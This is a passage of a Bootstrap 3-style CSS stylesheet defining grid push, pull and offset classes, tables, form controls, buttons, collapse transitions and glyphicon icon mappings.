.col-md-12 {
width: 100%;
}
.col-md-push-0 {
left: auto;
}
.col-md-push-1 {
left: 8.333333333333332%;
}
.col-md-push-2 {
left: 16.666666666666664%;
}
.col-md-push-3 {
left: 25%;
}
.col-md-push-4 {
left: 33.33333333333333%;
}
.col-md-push-5 {
left: 41.66666666666667%;
}
.col-md-push-6 {
left: 50%;
}
.col-md-push-7 {
left: 58.333333333333336%;
}
.col-md-push-8 {
left: 66.66666666666666%;
}
.col-md-push-9 {
left: 75%;
}
.col-md-push-10 {
left: 83.33333333333334%;
}
.col-md-push-11 {
left: 91.66666666666666%;
}
.col-md-pull-0 {
right: auto;
}
.col-md-pull-1 {
right: 8.333333333333332%;
}
.col-md-pull-2 {
right: 16.666666666666664%;
}
.col-md-pull-3 {
right: 25%;
}
.col-md-pull-4 {
right: 33.33333333333333%;
}
.col-md-pull-5 {
right: 41.66666666666667%;
}
.col-md-pull-6 {
right: 50%;
}
.col-md-pull-7 {
right: 58.333333333333336%;
}
.col-md-pull-8 {
right: 66.66666666666666%;
}
.col-md-pull-9 {
right: 75%;
}
.col-md-pull-10 {
right: 83.33333333333334%;
}
.col-md-pull-11 {
right: 91.66666666666666%;
}
.col-md-offset-0 {
margin-left: 0;
}
.col-md-offset-1 {
margin-left: 8.333333333333332%;
}
.col-md-offset-2 {
margin-left: 16.666666666666664%;
}
.col-md-offset-3 {
margin-left: 25%;
}
.col-md-offset-4 {
margin-left: 33.33333333333333%;
}
.col-md-offset-5 {
margin-left: 41.66666666666667%;
}
.col-md-offset-6 {
margin-left: 50%;
}
.col-md-offset-7 {
margin-left: 58.333333333333336%;
}
.col-md-offset-8 {
margin-left: 66.66666666666666%;
}
.col-md-offset-9 {
margin-left: 75%;
}
.col-md-offset-10 {
margin-left: 83.33333333333334%;
}
.col-md-offset-11 {
margin-left: 91.66666666666666%;
}
}
@media (min-width: 1200px) {
.container {
max-width: 1170px;
}
.col-lg-1,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9,
.col-lg-10,
.col-lg-11 {
float: left;
}
.col-lg-1 {
width: 8.333333333333332%;
}
.col-lg-2 {
width: 16.666666666666664%;
}
.col-lg-3 {
width: 25%;
}
.col-lg-4 {
width: 33.33333333333333%;
}
.col-lg-5 {
width: 41.66666666666667%;
}
.col-lg-6 {
width: 50%;
}
.col-lg-7 {
width: 58.333333333333336%;
}
.col-lg-8 {
width: 66.66666666666666%;
}
.col-lg-9 {
width: 75%;
}
.col-lg-10 {
width: 83.33333333333334%;
}
.col-lg-11 {
width: 91.66666666666666%;
}
.col-lg-12 {
width: 100%;
}
.col-lg-push-0 {
left: auto;
}
.col-lg-push-1 {
left: 8.333333333333332%;
}
.col-lg-push-2 {
left: 16.666666666666664%;
}
.col-lg-push-3 {
left: 25%;
}
.col-lg-push-4 {
left: 33.33333333333333%;
}
.col-lg-push-5 {
left: 41.66666666666667%;
}
.col-lg-push-6 {
left: 50%;
}
.col-lg-push-7 {
left: 58.333333333333336%;
}
.col-lg-push-8 {
left: 66.66666666666666%;
}
.col-lg-push-9 {
left: 75%;
}
.col-lg-push-10 {
left: 83.33333333333334%;
}
.col-lg-push-11 {
left: 91.66666666666666%;
}
.col-lg-pull-0 {
right: auto;
}
.col-lg-pull-1 {
right: 8.333333333333332%;
}
.col-lg-pull-2 {
right: 16.666666666666664%;
}
.col-lg-pull-3 {
right: 25%;
}
.col-lg-pull-4 {
right: 33.33333333333333%;
}
.col-lg-pull-5 {
right: 41.66666666666667%;
}
.col-lg-pull-6 {
right: 50%;
}
.col-lg-pull-7 {
right: 58.333333333333336%;
}
.col-lg-pull-8 {
right: 66.66666666666666%;
}
.col-lg-pull-9 {
right: 75%;
}
.col-lg-pull-10 {
right: 83.33333333333334%;
}
.col-lg-pull-11 {
right: 91.66666666666666%;
}
.col-lg-offset-0 {
margin-left: 0;
}
.col-lg-offset-1 {
margin-left: 8.333333333333332%;
}
.col-lg-offset-2 {
margin-left: 16.666666666666664%;
}
.col-lg-offset-3 {
margin-left: 25%;
}
.col-lg-offset-4 {
margin-left: 33.33333333333333%;
}
.col-lg-offset-5 {
margin-left: 41.66666666666667%;
}
.col-lg-offset-6 {
margin-left: 50%;
}
.col-lg-offset-7 {
margin-left: 58.333333333333336%;
}
.col-lg-offset-8 {
margin-left: 66.66666666666666%;
}
.col-lg-offset-9 {
margin-left: 75%;
}
.col-lg-offset-10 {
margin-left: 83.33333333333334%;
}
.col-lg-offset-11 {
margin-left: 91.66666666666666%;
}
}
table {
max-width: 100%;
background-color: transparent;
}
th {
text-align: left;
}
.table {
width: 100%;
margin-bottom: 20px;
}
.table thead > tr > th,
.table tbody > tr > th,
.table tfoot > tr > th,
.table thead > tr > td,
.table tbody > tr > td,
.table tfoot > tr > td {
padding: 8px;
line-height: 1.428571429;
vertical-align: top;
border-top: 1px solid #dddddd;
}
.table thead > tr > th {
vertical-align: bottom;
border-bottom: 2px solid #dddddd;
}
.table caption + thead tr:first-child th,
.table colgroup + thead tr:first-child th,
.table thead:first-child tr:first-child th,
.table caption + thead tr:first-child td,
.table colgroup + thead tr:first-child td,
.table thead:first-child tr:first-child td {
border-top: 0;
}
.table tbody + tbody {
border-top: 2px solid #dddddd;
}
.table .table {
background-color: #ffffff;
}
.table-condensed thead > tr > th,
.table-condensed tbody > tr > th,
.table-condensed tfoot > tr > th,
.table-condensed thead > tr > td,
.table-condensed tbody > tr > td,
.table-condensed tfoot > tr > td {
padding: 5px;
}
.table-bordered {
border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-child(odd) > td,
.table-striped > tbody > tr:nth-child(odd) > th {
background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover > td,
.table-hover > tbody > tr:hover > th {
background-color: #f5f5f5;
}
table col[class*="col-"] {
display: table-column;
float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
display: table-cell;
float: none;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
background-color: #f5f5f5;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
background-color: #dff0d8;
border-color: #d6e9c6;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td {
background-color: #d0e9c6;
border-color: #c9e2b3;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
background-color: #f2dede;
border-color: #eed3d7;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td {
background-color: #ebcccc;
border-color: #e6c1c7;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
background-color: #fcf8e3;
border-color: #fbeed5;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td {
background-color: #faf2cc;
border-color: #f8e5be;
}
@media (max-width: 768px) {
.table-responsive {
width: 100%;
margin-bottom: 15px;
overflow-x: scroll;
overflow-y: hidden;
border: 1px solid #dddddd;
}
.table-responsive > .table {
margin-bottom: 0;
background-color: #fff;
}
.table-responsive > .table > thead > tr > th,
.table-responsive > .table > tbody > tr > th,
.table-responsive > .table > tfoot > tr > th,
.table-responsive > .table > thead > tr > td,
.table-responsive > .table > tbody > tr > td,
.table-responsive > .table > tfoot > tr > td {
white-space: nowrap;
}
.table-responsive > .table-bordered {
border: 0;
}
.table-responsive > .table-bordered > thead > tr > th:first-child,
.table-responsive > .table-bordered > tbody > tr > th:first-child,
.table-responsive > .table-bordered > tfoot > tr > th:first-child,
.table-responsive > .table-bordered > thead > tr > td:first-child,
.table-responsive > .table-bordered > tbody > tr > td:first-child,
.table-responsive > .table-bordered > tfoot > tr > td:first-child {
border-left: 0;
}
.table-responsive > .table-bordered > thead > tr > th:last-child,
.table-responsive > .table-bordered > tbody > tr > th:last-child,
.table-responsive > .table-bordered > tfoot > tr > th:last-child,
.table-responsive > .table-bordered > thead > tr > td:last-child,
.table-responsive > .table-bordered > tbody > tr > td:last-child,
.table-responsive > .table-bordered > tfoot > tr > td:last-child {
border-right: 0;
}
.table-responsive > .table-bordered > thead > tr:last-child > th,
.table-responsive > .table-bordered > tbody > tr:last-child > th,
.table-responsive > .table-bordered > tfoot > tr:last-child > th,
.table-responsive > .table-bordered > thead > tr:last-child > td,
.table-responsive > .table-bordered > tbody > tr:last-child > td,
.table-responsive > .table-bordered > tfoot > tr:last-child > td {
border-bottom: 0;
}
}
fieldset {
padding: 0;
margin: 0;
border: 0;
}
legend {
display: block;
width: 100%;
padding: 0;
margin-bottom: 20px;
font-size: 21px;
line-height: inherit;
color: #333333;
border: 0;
border-bottom: 1px solid #e5e5e5;
}
label {
display: inline-block;
margin-bottom: 5px;
font-weight: bold;
}
input[type="search"] {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
margin: 4px 0 0;
margin-top: 1px \9;
/* IE8-9 */
line-height: normal;
}
input[type="file"] {
display: block;
}
select[multiple],
select[size] {
height: auto;
}
select optgroup {
font-family: inherit;
font-size: inherit;
font-style: inherit;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
outline: thin dotted #333;
outline: 5px auto -webkit-focus-ring-color;
outline-offset: -2px;
}
input[type="number"]::-webkit-outer-spin-button,
input[type="number"]::-webkit-inner-spin-button {
height: auto;
}
.form-control:-moz-placeholder {
color: #999999;
}
.form-control::-moz-placeholder {
color: #999999;
}
.form-control:-ms-input-placeholder {
color: #999999;
}
.form-control::-webkit-input-placeholder {
color: #999999;
}
.form-control {
display: block;
width: 100%;
height: 34px;
padding: 6px 12px;
font-size: 14px;
line-height: 1.428571429;
color: #555555;
vertical-align: middle;
background-color: #ffffff;
border: 1px solid #cccccc;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
-webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
}
.form-control:focus {
border-color: #66afe9;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(102, 175, 233, 0.6);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
cursor: not-allowed;
background-color: #eeeeee;
}
textarea.form-control {
height: auto;
}
.form-group {
margin-bottom: 15px;
}
.radio,
.checkbox {
display: block;
min-height: 20px;
padding-left: 20px;
margin-top: 10px;
margin-bottom: 10px;
vertical-align: middle;
}
.radio label,
.checkbox label {
display: inline;
margin-bottom: 0;
font-weight: normal;
cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
float: left;
margin-left: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
display: inline-block;
padding-left: 20px;
margin-bottom: 0;
font-weight: normal;
vertical-align: middle;
cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
margin-top: 0;
margin-left: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
.radio[disabled],
.radio-inline[disabled],
.checkbox[disabled],
.checkbox-inline[disabled],
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"],
fieldset[disabled] .radio,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox,
fieldset[disabled] .checkbox-inline {
cursor: not-allowed;
}
.input-sm {
height: 30px;
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
select.input-sm {
height: 30px;
line-height: 30px;
}
textarea.input-sm {
height: auto;
}
.input-lg {
height: 45px;
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
select.input-lg {
height: 45px;
line-height: 45px;
}
textarea.input-lg {
height: auto;
}
.has-warning .help-block,
.has-warning .control-label {
color: #c09853;
}
.has-warning .form-control {
border-color: #c09853;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
border-color: #a47e3c;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
color: #c09853;
background-color: #fcf8e3;
border-color: #c09853;
}
.has-error .help-block,
.has-error .control-label {
color: #b94a48;
}
.has-error .form-control {
border-color: #b94a48;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
border-color: #953b39;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
color: #b94a48;
background-color: #f2dede;
border-color: #b94a48;
}
.has-success .help-block,
.has-success .control-label {
color: #468847;
}
.has-success .form-control {
border-color: #468847;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
border-color: #356635;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
color: #468847;
background-color: #dff0d8;
border-color: #468847;
}
.form-control-static {
padding-top: 7px;
margin-bottom: 0;
}
.help-block {
display: block;
margin-top: 5px;
margin-bottom: 10px;
color: #737373;
}
@media (min-width: 768px) {
.form-inline .form-group {
display: inline-block;
margin-bottom: 0;
vertical-align: middle;
}
.form-inline .form-control {
display: inline-block;
}
.form-inline .radio,
.form-inline .checkbox {
display: inline-block;
padding-left: 0;
margin-top: 0;
margin-bottom: 0;
}
.form-inline .radio input[type="radio"],
.form-inline .checkbox input[type="checkbox"] {
float: none;
margin-left: 0;
}
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
padding-top: 7px;
margin-top: 0;
margin-bottom: 0;
}
.form-horizontal .form-group {
margin-right: -15px;
margin-left: -15px;
}
.form-horizontal .form-group:before,
.form-horizontal .form-group:after {
display: table;
content: " ";
}
.form-horizontal .form-group:after {
clear: both;
}
.form-horizontal .form-group:before,
.form-horizontal .form-group:after {
display: table;
content: " ";
}
.form-horizontal .form-group:after {
clear: both;
}
@media (min-width: 768px) {
.form-horizontal .control-label {
text-align: right;
}
}
.btn {
display: inline-block;
padding: 6px 12px;
margin-bottom: 0;
font-size: 14px;
font-weight: normal;
line-height: 1.428571429;
text-align: center;
white-space: nowrap;
vertical-align: middle;
cursor: pointer;
border: 1px solid transparent;
border-radius: 4px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
-o-user-select: none;
user-select: none;
}
.btn:focus {
outline: thin dotted #333;
outline: 5px auto -webkit-focus-ring-color;
outline-offset: -2px;
}
.btn:hover,
.btn:focus {
color: #333333;
text-decoration: none;
}
.btn:active,
.btn.active {
background-image: none;
outline: 0;
-webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
pointer-events: none;
cursor: not-allowed;
opacity: 0.65;
filter: alpha(opacity=65);
-webkit-box-shadow: none;
box-shadow: none;
}
.btn-default {
color: #333333;
background-color: #ffffff;
border-color: #cccccc;
}
.btn-default:hover,
.btn-default:focus,
.btn-default:active,
.btn-default.active,
.open .dropdown-toggle.btn-default {
color: #333333;
background-color: #ebebeb;
border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open .dropdown-toggle.btn-default {
background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
background-color: #ffffff;
border-color: #cccccc;
}
.btn-primary {
color: #ffffff;
background-color: #FfFfFf;
border-color: #357ebd;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary:active,
.btn-primary.active,
.open .dropdown-toggle.btn-primary {
color: #ffffff;
background-color: #3276b1;
border-color: #285e8e;
}
.btn-primary:active,
.btn-primary.active,
.open .dropdown-toggle.btn-primary {
background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
background-color: #FfFfFf;
border-color: #357ebd;
}
.btn-warning {
color: #ffffff;
background-color: #f0ad4e;
border-color: #eea236;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning:active,
.btn-warning.active,
.open .dropdown-toggle.btn-warning {
color: #ffffff;
background-color: #ed9c28;
border-color: #d58512;
}
.btn-warning:active,
.btn-warning.active,
.open .dropdown-toggle.btn-warning {
background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
background-color: #f0ad4e;
border-color: #eea236;
}
.btn-danger {
color: #ffffff;
background-color: #d9534f;
border-color: #d43f3a;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger:active,
.btn-danger.active,
.open .dropdown-toggle.btn-danger {
color: #ffffff;
background-color: #d2322d;
border-color: #ac2925;
}
.btn-danger:active,
.btn-danger.active,
.open .dropdown-toggle.btn-danger {
background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
background-color: #d9534f;
border-color: #d43f3a;
}
.btn-success {
color: #ffffff;
background-color: #5cb85c;
border-color: #4cae4c;
}
.btn-success:hover,
.btn-success:focus,
.btn-success:active,
.btn-success.active,
.open .dropdown-toggle.btn-success {
color: #ffffff;
background-color: #47a447;
border-color: #398439;
}
.btn-success:active,
.btn-success.active,
.open .dropdown-toggle.btn-success {
background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
background-color: #5cb85c;
border-color: #4cae4c;
}
.btn-info {
color: #ffffff;
background-color: #5bc0de;
border-color: #46b8da;
}
.btn-info:hover,
.btn-info:focus,
.btn-info:active,
.btn-info.active,
.open .dropdown-toggle.btn-info {
color: #ffffff;
background-color: #39b3d7;
border-color: #269abc;
}
.btn-info:active,
.btn-info.active,
.open .dropdown-toggle.btn-info {
background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
background-color: #5bc0de;
border-color: #46b8da;
}
.btn-link {
font-weight: normal;
color: #FfFfFf;
cursor: pointer;
border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
background-color: transparent;
-webkit-box-shadow: none;
box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
color: #2a6496;
text-decoration: underline;
background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
color: #999999;
text-decoration: none;
}
.btn-lg {
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
.btn-sm,
.btn-xs {
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-xs {
padding: 1px 5px;
}
.btn-block {
display: block;
width: 100%;
padding-right: 0;
padding-left: 0;
}
.btn-block + .btn-block {
margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
width: 100%;
}
.fade {
opacity: 0;
-webkit-transition: opacity 0.15s linear;
transition: opacity 0.15s linear;
}
.fade.in {
opacity: 1;
}
.collapse {
display: none;
}
.collapse.in {
display: block;
}
.collapsing {
position: relative;
height: 0;
overflow: hidden;
-webkit-transition: height 0.35s ease;
transition: height 0.35s ease;
}
@font-face {
font-family: 'Glyphicons Halflings';
src: url('../fonts/glyphicons-halflings-regular.eot');
src: url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../fonts/glyphicons-halflings-regular.woff') format('woff'), url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular') format('svg');
}
.glyphicon {
position: relative;
top: 1px;
display: inline-block;
font-family: 'Glyphicons Halflings';
-webkit-font-smoothing: antialiased;
font-style: normal;
font-weight: normal;
line-height: 1;
}
.glyphicon-asterisk:before {
content: "\2a";
}
.glyphicon-plus:before {
content: "\2b";
}
.glyphicon-euro:before {
content: "\20ac";
}
.glyphicon-minus:before {
content: "\2212";
}
.glyphicon-cloud:before {
content: "\2601";
}
.glyphicon-envelope:before {
content: "\2709";
}
.glyphicon-pencil:before {
content: "\270f";
}
.glyphicon-glass:before {
content: "\e001";
}
.glyphicon-music:before {
content: "\e002";
}
.glyphicon-search:before {
content: "\e003";
}
.glyphicon-heart:before {
content: "\e005";
}
.glyphicon-star:before {
content: "\e006";
}
.glyphicon-star-empty:before {
content: "\e007";
}
.glyphicon-user:before {
content: "\e008";
}
.glyphicon-film:before {
content: "\e009";
}
.glyphicon-th-large:before {
content: "\e010";
}
.glyphicon-th:before {
content: "\e011";
}
.glyphicon-th-list:before {
content: "\e012";
}
.glyphicon-ok:before {
content: "\e013";
}
.glyphicon-remove:before {
content: "\e014";
}
.glyphicon-zoom-in:before {
content: "\e015";
}
.glyphicon-zoom-out:before {
content: "\e016";
}
.glyphicon-off:before {
content: "\e017";
}
.glyphicon-signal:before {
content: "\e018";
}
.glyphicon-cog:before {
content: "\e019";
}
.glyphicon-trash:before {
content: "\e020";
}
.glyphicon-home:before {
content: "\e021";
}
.glyphicon-file:before {
content: "\e022";
}
.glyphicon-time:before {
content: "\e023";
}
.glyphicon-road:before {
content: "\e024";
}
.glyphicon-download-alt:before {
content: "\e025";
}
.glyphicon-download:before {
content: "\e026";
}
.glyphicon-upload:before {
content: "\e027";
}
.glyphicon-inbox:before {
content: "\e028";
}
.glyphicon-play-circle:before {
content: "\e029";
}
.glyphicon-repeat:before {
content: "\e030";
}
.glyphicon-refresh:before {
content: "\e031";
}
.glyphicon-list-alt:before {
content: "\e032";
}
.glyphicon-flag:before {
content: "\e034";
}
.glyphicon-headphones:before {
content: "\e035";
}
.glyphicon-volume-off:before {
content: "\e036";
}
.glyphicon-volume-down:before {
content: "\e037";
}
.glyphicon-volume-up:before {
content: "\e038";
}
.glyphicon-qrcode:before {
content: "\e039";
}
.glyphicon-barcode:before {
content: "\e040";
}
.glyphicon-tag:before {
content: "\e041";
}
.glyphicon-tags:before {
content: "\e042";
}
.glyphicon-book:before {
content: "\e043";
}
.glyphicon-print:before {
content: "\e045";
}
.glyphicon-font:before {
content: "\e047";
}
.glyphicon-bold:before {
content: "\e048";
}
.glyphicon-italic:before {
content: "\e049";
}
.glyphicon-text-height:before {
content: "\e050";
}
.glyphicon-text-width:before {
content: "\e051";
}
.glyphicon-align-left:before {
content: "\e052";
}
.glyphicon-align-center:before {
content: "\e053";
}
.glyphicon-align-right:before {
content: "\e054";
}
.glyphicon-align-justify:before {
content: "\e055";
}
.glyphicon-list:before {
content: "\e056";
}
.glyphicon-indent-left:before {
content: "\e057";
}
.glyphicon-indent-right:before {
content: "\e058";
}
.glyphicon-facetime-video:before {
content: "\e059";
}
.glyphicon-picture:before {
content: "\e060";
}
.glyphicon-map-marker:before {
content: "\e062";
}
.glyphicon-adjust:before {
content: "\e063";
}
.glyphicon-tint:before {
content: "\e064";
}
.glyphicon-edit:before {
content: "\e065";
}
.glyphicon-share:before {
content: "\e066";
}
.glyphicon-check:before {
content: "\e067";
}
.glyphicon-move:before {
content: "\e068";
}
.glyphicon-step-backward:before {
content: "\e069";
}
.glyphicon-fast-backward:before {
content: "\e070";
}
.glyphicon-backward:before {
content: "\e071";
}
.glyphicon-play:before {
content: "\e072";
}
.glyphicon-pause:before {
content: "\e073";
}
.glyphicon-stop:before {
content: "\e074";
}
.glyphicon-forward:before {
content: "\e075";
}
.glyphicon-fast-forward:before {
content: "\e076";
}
.glyphicon-step-forward:before {
content: "\e077";
}
.glyphicon-eject:before {
content: "\e078";
}
.glyphicon-chevron-left:before {
content: "\e079";
}
.glyphicon-chevron-right:before {
content: "\e080";
}
.glyphicon-plus-sign:before {
content: "\e081";
}
.glyphicon-minus-sign:before {
content: "\e082";
}
.glyphicon-remove-sign:before {
content: "\e083";
}
.glyphicon-ok-sign:before {
content: "\e084";
}
.glyphicon-question-sign:before {
content: "\e085";
}
.glyphicon-info-sign:before {
content: "\e086";
}
.glyphicon-screenshot:before {
content: "\e087";
}
.glyphicon-remove-circle:before {
content: "\e088";
}
.glyphicon-ok-circle:before {
content: "\e089";
}
.glyphicon-ban-circle:before {
content: "\e090";
}
.glyphicon-arrow-left:before {
content: "\e091";
}
.glyphicon-arrow-right:before {
content: "\e092";
}
.glyphicon-arrow-up:before {
content: "\e093";
}
.glyphicon-arrow-down:before {
content: "\e094";
}
.glyphicon-share-alt:before {
content: "\e095";
}
.glyphicon-resize-full:before {
content: "\e096";
}
.glyphicon-resize-small:before {
content: "\e097";
}
.glyphicon-exclamation-sign:before {
content: "\e101";
}
.glyphicon-gift:before {
content: "\e102";
}
.glyphicon-leaf:before {
content: "\e103";
}
.glyphicon-eye-open:before {
content: "\e105";
}
.glyphicon-eye-close:before {
content: "\e106";
}
.glyphicon-warning-sign:before {
content: "\e107";
}
